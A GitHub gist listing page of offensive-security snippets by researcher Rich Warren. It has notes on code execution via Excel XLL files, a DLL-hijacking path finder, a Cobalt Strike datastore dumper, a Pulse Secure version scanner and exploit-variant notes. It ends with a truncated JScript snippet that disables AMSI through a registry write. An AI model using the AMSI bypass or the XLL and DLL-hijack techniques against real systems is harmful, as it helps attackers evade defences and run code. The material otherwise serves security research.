Skip to content

Instantly share code, notes, and snippets.

View rxwx's full-sized avatar

Rich Warren rxwx

530 followers · 0 following
View GitHub Profile
@rxwx
rxwx / Readme.md
Last active May 4, 2023 14:19

Notes

An XLL file is basically a DLL with some special features to make it work with Excel.

See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

@rxwx
rxwx / trac-decode.py
Created September 7, 2023 17:54
Decode "Obscured" Check Point Trac.config files
import io
import sys
import string
KEY_STR = 'ModifiedFwPropertySheetWithOKTheSheetIDS_LDAP_AU_PROPERTIESNULL0FW_WP_OBJECTS'
def get_byte(x):
c = ord(chr(x).lower())
if ((c - 0x30) & 255) < 10:
retval = c - 0x30
@rxwx
rxwx / GetSxsPath.cs
Created July 3, 2023 12:43
Determine redirection path for SxS DotLocal DLL Hijacking
using System;
using System.IO;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using static GetSxsPath.NativeMethods;
namespace GetSxsPath
{
internal class NativeMethods
@rxwx
rxwx / dump_beacon_datastore.py
Last active September 25, 2023 19:34
Dump items (BOFs, assemblies, files etc.) from the CobaltStrike 4.9+ beacon datastore (stored with BeaconDataStoreProtectItem / data-store load)
from ctypes import wintypes
import argparse
import ctypes
import yara
import hexdump
"""
.text:0000000180010840 ; char __fastcall BeaconDataStoreUnprotectItem(unsigned __int64)
.text:0000000180010840 BeaconDataStoreUnprotectItem proc near ; CODE XREF: sub_1800100F8+9E↑p
.text:0000000180010840 ; sub_1800102E8+AD↑p
@rxwx
rxwx / pulseversion.py
Created August 13, 2019 09:04
Pulse Secure Version Scanner
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python pulseversion.py <target ip/domain>"
sys.exit(1)
@rxwx
rxwx / notes.md
Last active March 22, 2024 02:04
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

@rxwx
rxwx / bypass.js
Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI